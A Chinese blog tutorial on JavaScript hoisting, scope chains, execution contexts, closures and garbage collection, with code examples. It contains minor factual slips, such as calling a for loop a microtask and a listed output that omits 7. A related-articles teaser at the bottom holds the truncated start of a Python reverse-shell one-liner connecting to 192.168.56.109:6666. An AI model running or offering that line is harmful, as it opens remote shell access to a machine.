首页 > 其他分享 >JS闭包和作用域(必学知识点总结)

JS闭包和作用域(必学知识点总结)

时间:2022-12-20 19:44:06浏览次数:59  
标签:知识点 函数 作用域 必学 let 上下文 声明 变量

目录

闭包和作用域


变量声明

var 声明特点

  1. 在使用var声明变量时,变量会被自动添加到最接近的上下文
  2. var存在声明提升var声明会被拿到函数或全局作用域的顶部,位于作用域中所有代码之前。
  3. 可多次重复声明。而重复的var声明则会被忽略

let 声明特点

  1. let声明存在块级作用域

  2. let声明(创建过程)存在提升。但由于暂时性死区(temporal dead zone),无法在let声明之前去使用变量

  3. 在同一作用域内无法重复声明。重复的let声明会抛出SyntaxError错误

const 声明特点

  1. const声明存在块级作用域
  2. const一旦声明后在其生命周期内都无法重新赋予新值
  3. 其余与let声明一致

变量和函数的声明提升

变量声明与函数声明都存在提升。可以记住以下几个点:

  1. 变量声明中由var定义的变量会提升到其所在作用域的顶部。
  2. 变量声明中letconst提升效果一致,即由其定义的变量都会在创建过程被提升,但在初始化阶段被暂时性死区所扼杀
  3. 函数声明优先于变量声明。而函数表达式则会作为一个变量提升,其提升效果取决于用let还是var定义。

变量和函数的具体声明情况如下:

  • let的「创建」过程被提升了,但是初始化没有提升。
  • var的「创建」和「初始化」都被提升了。
  • function的「创建」「初始化」和「赋值」都被提升了。

来看这样三段代码:

第一段:var 变量声明效果

// 第一段
console.log(a) // 输出:undefined
var a = 10

上面代码运行后的实际情况如下:

var a // y 变量声明提升到其所在作用域的顶部
console.log(a)
a = 10

第二段:let变量声明效果(const与其一致)

// 第二段
{
    console.log(x) // 产生暂时性死区,无法访问变量。
    // 报错内容:Uncaught ReferenceError: Cannot access 'x' before initialization
    // 在值初始化之前无法访问 x ,即变量在初始化阶段被暂时性死区所扼杀
    let x = 10
}

第三段:函数声明与函数表达式声明效果

// 第三段:
var foo = function () {
    console.log('我是函数表达式')
}
function foo() {
    console.log('我是函数声明')
}
foo()
// 按照我们常规思维去思考一下,也许会输出'我是函数声明'。
// 但去执行一下,输出:'我是函数表达式'

上面代码运行后的实际情况如下:

function foo() {  // foo 作为函数声明被提升了
    console.log('我是函数声明')
}
var foo // foo 作为 var 变量声明被提升了 
foo = function () {
    console.log('我是函数表达式')
}
foo()
// 其中函数声明优先于变量声明,这也就解释了为什么不会输出'我是函数声明'。

作用域和作用域链

作用域

作用域分类:

  1. 全局作用域
  2. 函数作用域(function函数体内 )
  3. 块级作用域(letconst声明存在块级作用域)
// 全局作用域

function foo() {
    // 函数作用域
}

{
    let c = 30
    // 块级作用域
}

词法作用域:JavaScript会利用词法分析器分析我们书写的代码,从而依据变量和函数的命名位置来动态生成不同的作用域。即我们在定义变量或函数的时候,就已经决定了它们之间在不同作用域上的关系。

作用域链

作用域链由执行上下文中的变量对象逐级构成。

学习要点:

  1. 作用域链的用途,是保证对执行环境有权访问的所有变量和函数的有序访问。
  2. 每个环境都可以逐级向上搜索作用域链查询变量和函数名;但任何环境都不能通过向下搜索作用域链。
  3. 自由变量:未在当前作用域定义的变量。自由变量会按照作用域链的查找机制,逐级向上查找与之对应的变量

执行上下文

执行上下文保存着变量对象,作用域链和this

学习要点:

  1. 所有通过var定义的全局变量会函数都会成为window对象的属性和方法。但使用letconst的声明的全局变量和函数不会定义在全局上下文中。
  2. 每个函数被调用时都会产生一个执行上下文。这个执行上下文会被推入栈。在函数执行完毕后,该执行上下文会在栈弹出,将控制权返还给之前的执行上下文。
  3. 当前作用域链中的第一个变量对象来自上一个上下文,下一个变量对象来自再上一个上下文。以此类推直至全局上下文。

执行上下文分类:

  1. 全局上下文 (window对象)
  2. 函数上下文
  3. eval()上下文

来看这样一段代码:

let a = 10
function sum() {
    let b = 20
    function add() {
        let c = 30
        console.log(a + b + c)
    }
    add()
}
sum()

执行上下文内容如下:

全局执行上下文:
[ 作用域链:[], 变量对象:[ a, sum ], this: window ]

sum 函数执行上下文:
[ 作用域链:[ 全局变量对象:[ a, sum ] ], 变量对象:[ b, add ] , this: window ]

add 函数执行上下文:
[ 作用域链:[ add函数的变量对象: [ b, add ], 全局变量对象:[ a, sum ] ], 变量对象:[c] , this: window ]

入栈过程

  1. 首先调用sum函数将其推入栈,产生了第一个函数执行上下文。

  2. 紧接着sum函数内部又调用add函数,于是又将其函数推入栈,产生了第二个函数执行上下文。

出栈过程

  1. add函数执行完毕后将其弹出栈,控制权交给sum函数。

  2. sum函数执行完毕后将其弹出栈,控制权交给全局上下文。

  3. 当浏览器关闭后,全局上下文会出栈。


闭包

闭包定义:在一个嵌套函数里,内部函数可以访问外部函数的变量。

闭包应用:封装对象的私有属性和方法。即对数据作隐藏和封装,防止污染全局变量

闭包作用:多个闭包可以共享相同的函数定义,但却保存了不同的词法环境。

来看这样三段代码:

// 前置知识:setTimeout在事件循环机制中作为宏任务,for循环属于微任务。
// 宏任务会在微任务之后执行,即我们的for循环会先一步于setTimeout结束。
for (var i = 0; i < 10; i++) {
    setTimeout(function () {
        console.log(i)
    }, 3000)
} // 输出结果:输出10次 10 !
// 每循环一次,都共享了相同的词法环境(全局作用域)。

我们给setTimeout套一个立即执行函数,如下:

for (var i = 0; i < 10; i++) {
    (function (i) { // 我们的闭包函数,相对于全局环境
        setTimeout(function () {
            console.log(i) // 内部函数访问了外部函数的变量
        }, 3000)
    })(i)
} // 输出结果:3秒后输出 0 1 2 3 4 5 6 8 9
// 每循环一次,立即执行函数就创建了不同的词法环境(块级作用域)。

我们换另一种形式去验证一下:

for (var i = 0; i < 10; i++) {
    let a = function (i) { // 我们的闭包函数,相对于全局环境
        setTimeout(function () {
            console.log(i) // 内部函数访问了外部函数的变量
        }, 3000)
    }
    a(i)
} // 输出结果:同样3秒后输出 0 1 2 3 4 5 6 8 9 

特别注意:不能滥用闭包,因为闭包在处理速度和内存消耗方面对脚本性能具有负面影响。


垃圾回收机制

作用:垃圾回收程序会跟踪记录需要使用的变量和不需使用的变量,自动进行内存管理实现内存分配和闲置资源回收。

内存的生命周期:

  1. 分配你所需要的内存
  2. 使用分配到的内存(读、写)
  3. 不需要时将其释放

在浏览器的发展史上,主要有两种标记策略:引用计数和标记清理。

引用计数

基本原理:当首次声明变量并赋一个引用类型值时,会将这个值的引用次数设定为1。当这个值被赋给其他变量时,这个值的引用次数会再加1。当这个值被其他值所覆盖时,引用次数会减1。直到引用次数为0时,垃圾回收机制则会“上门回收”这个值

来看这样一段代码:

let a = { name: '小红' } // 首次值赋变量,引用计数为 1
let b = a // 值赋变量,引用计数 +1 为 2
let c = a // 值赋变量,引用计数 +1 为 3

c = null // 值被覆盖,引用计数 -1 为 2
b = null // 值被覆盖,引用计数 -1 为 1
a = null // 值被覆盖,引用计数 -1 为 0 被垃圾回收机制回收

循环引用(引用计数的缺陷问题)

来看这样一段代码

function foo() {
    let a = { name: '小红' }
    let b = { name: '小明' }
    a.name = b // b赋值给a对象中的name,b的引用次数为2
    b.name = a // a赋值给b对象中的name,a的引用次数为2
} // 说明:对象属性值作为变量被赋值
foo()

过程解析:函数的变量对象在函数调用完成之后会将每个变量值设为null ,以便垃圾回收机制进行回收。但在引用计数算法的策略中,函数在调用后,循环引用的变量ab依然保留了一次引用次数。也就是说,这两个引用类型的引用次数为1,不会进行回收。

标记清除

基本原理:标志清除算法把“对象不再需要”简化定义为“对象是否可以获得”。垃圾回收器将定期从根(全局对象)开始,找所有从根开始引用的对象,然后找这些对象引用的对象......直到最终垃圾回收器将找到所有可以获取的对象和收集所有不能获取的对象,其中不能获取的对象则会被回收。


参考

MDN-闭包

我用了两个月的时间才理解 let

JavaScript高级程序设计(第4版)

标签:知识点,函数,作用域,必学,let,上下文,声明,变量
From: https://www.cnblogs.com/chscript/p/16994955.html

相关文章

  • 根据分析查看相关知识点分析iOS 三种录制视频方式
    这篇文章讨论了关于如何配置视频捕获管线(pipeline)和最大限度地利用硬件性能的一些不同选择。这里有个使用了不同管线的样例app,可以在​​ GitHub​​查看。 第一......
  • JS 的 9 种作用域
    作用域想必大家都知道,就是变量生效的范围,比如函数就会生成一个作用域,声明的变量只在函数内生效。而这样的作用域一共有9种,其中几种绝大多数前端都说不出来。下面我们就......
  • 【CANN训练营第三季】昇腾AI入门课知识点整理和汇总
    【CANN训练营第三季】昇腾AI入门课知识点整理和汇总CANN提供的昇腾语言计算接口是:AscendCL。 昇腾目前支持以下AI深度学习框架:昇思MindSpore、TensorFlow、PytorchCANN包含......
  • 变量、常量、作用域
    变量变量是什么?就是可以变化的量!Java是一种强类型语言,每个变量都必须声明其类型。Java变量是程序中最基本的存储单元,其要素包括变量名,变量类型和作用域。typevarName......
  • 计算机视觉知识点汇总
    ​​ARM优化​​​​CPU硬件基础​​​​数字图像处理​​​​深度学习基础知识​​​​矩阵乘优化​​​​经典卷积网络​​​​神经网络量化与压缩​​​​模型剪枝​​......
  • 关于c语言指针还有二级指针的一些知识点理解
    二级指针:指向指针的指针;例如**p,这里p就是一个二级指针,假设p就是指向了一个指针q,q又指向了一个变量a;看下图:对二级指针进行一级解引用是指向指针的地址,在这里*ppa的值......
  • SpringBoot知识点
    自动装配原理SpringBoot特点优点:(1)创建独立Spring应用(2)内嵌web服务器(3)自动start依赖,简化构建配置(4)自动配置Spring以及第三方功能(5)提供生产级别的监控、健康检测以及......
  • 【博学谷学习记录】超强总结,用心分享。数据库的重要知识点。
    一.数据库事务 1.事务特性 原子性:即不可分割性,事务要么全部被执行,要么就全部不被执行。一致性:事务的执行使得数据库从一种正确状态转换成另一种正确状态隔离性:在......
  • vue知识点
    第一章、vue的指令与过滤器1.内容渲染指令1.1.v-text:缺点会覆盖元素内部原有的内容1.2.{{}}:插值表达式,只是内容的占位符不会覆盖原来的内容1.3.v-html:可以带有标......
  • 零散知识点
    pythonptypython-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.109",6666));os.dup2(s.fileno(......